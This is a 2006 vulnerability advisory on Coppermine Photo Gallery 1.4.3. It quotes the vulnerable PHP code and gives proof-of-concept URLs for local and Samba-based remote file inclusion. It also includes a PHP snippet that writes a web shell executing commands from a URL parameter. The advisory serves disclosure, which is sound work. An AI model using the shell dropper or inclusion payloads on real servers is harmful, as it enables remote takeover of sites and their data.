- Coppermine Photo Gallery <= 1.4.3 arbitrary local/remote inclusion: --------- - 18/02/2006 5.09.55 ----------------------------------------------------------- -------------------------------------------------------------------------------- software: site: http://coppermine-gallery.net/index.php description: "Coppermine is a multi-purpose fully-featured and integrated web picture gallery script written in PHP using GD or ImageMagick as image library with a MySQL backend." -------------------------------------------------------------------------------- i) vulnerable code in include/init.inc.php near lines 308-343, processing "lang" argument ... // Process language selection if present in URI or in user profile or try // autodetection if default charset is utf-8 if (!empty($_GET['lang'])) { $USER['lang'] = $_GET['lang']; [!!!!!!!!!!!!!!] } if (isset($USER['lang']) && !strstr($USER['lang'], '/') && file_exists('lang/' . $USER['lang'] . '.php')) { $CONFIG['default_lang'] = $CONFIG['lang']; // Save default language $CONFIG['lang'] = strtr($USER['lang'], '$/\\:*?"\'<>|`', '____________'); } elseif ($CONFIG['charset'] == 'utf-8') { include('include/select_lang.inc.php'); if (file_exists('lang/' . $USER['lang'] . '.php')) { $CONFIG['default_lang'] = $CONFIG['lang']; // Save default language $CONFIG['lang'] = $USER['lang']; // [!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!] } } else { unset($USER['lang']); } if (isset($CONFIG['default_lang']) && ($CONFIG['default_lang']==$CONFIG['lang'])) { unset($CONFIG['default_lang']); } if (!file_exists("lang/{$CONFIG['lang']}.php")) [!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!] $CONFIG['lang'] = 'english'; // We load the chosen language file require "lang/{$CONFIG['lang']}.php"; [!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!] ... without to be logged in, arbitrary local inclusion, poc: look at [!!!!!], code is like this: ... $USER['lang'] = $_GET['lang']; ... $CONFIG['lang'] = $USER['lang']; ... if (!file_exists("lang/{$CONFIG['lang']}.php")) $CONFIG['lang'] = 'english'; ... require "lang/{$CONFIG['lang']}.php"; you have only to supply an existing file using ../ and a null char... (also regardless of magic_quotes_gpc settings, because of Coppermine disable code) you will have no output because is disabled, but you can proceed so: upload a malicious zip file , inside we have php code like this: <?php $suntzu=fopen("shell.php","w"); fputs($suntzu,"<?php system(\$HTTP_GET_VARS[CMD]);?>"); fclose($suntzu); chmod("shell.php",777); ?> now: http://[target]/[path]/thumbnails.php?lang=../albums/userpics/10002/shell.zip%00 (.zip file contempt is not checked like images and in userpics/ folder we have a folder numbered like 10000 + userid, you can easily and quicly bruteforce url to find the malicious file) if you succeed you can launch commands on target system: http://[target]/[path]/shell.php?CMD=ls%20-la --------------------------------------------------------------------------------- ii) vulnerable code in docs/showdoc.php at line 21: ... if (isset($_REQUEST['f'])) { $file = $_REQUEST['f']; } else { $file = ''; } ... ... // harden against expolits: check the requested vars, replace illegal chars $file = stripslashes($file); [!] $forbidden_chars = array("..", "/", "%", "<", ">", "$", "'", '"'); [!!] $file = str_replace($forbidden_chars, '', $file); [!!!] ob_start(); @include($file); [!!!!] ... poc: http://[target]/[path]/docs/showdoc.php?f=c:\boot.ini http://[target]/[path]/docs/showdoc.php?f=\\192.168.1.2\c\shell.php (the last one from a samba resource...) if magic_quotes_gpc=on, "c:\\boot.ini" after stripslashes becomes "c:\boot.ini" (cause striplashes do not remove all "\"s ) and "\\\\192.168.1.2\\c\\shell.php" becomes "\\192.168.1.2\c\shell.php" poc 2: http://[target]/[path]/docs/showdoc.php?f=c:\\boot.ini http://[target]/[path]/docs/showdoc.php?f=\\\\192.168.1.2\\c\\shell.php if magic_quotes_gpc=off: "f" becomes "c:\boot.ini" or "\\192.168.1.2\c\shell.php" so you can include local and external (Samba) resources regardless of magic_quotes_gpc settings ________________________________________________________________________________ full proof of concept exploit for i) at this url: http://retrogod.altervista.org/cpg_143_incl_xpl.html ________________________________________________________________________________ rgod site: http://retrogod.altervista.org mail: rgod at autistici org original advisory: http://retrogod.altervista.org/cpg_143_adv.html --------------------------------------------------------------------------------
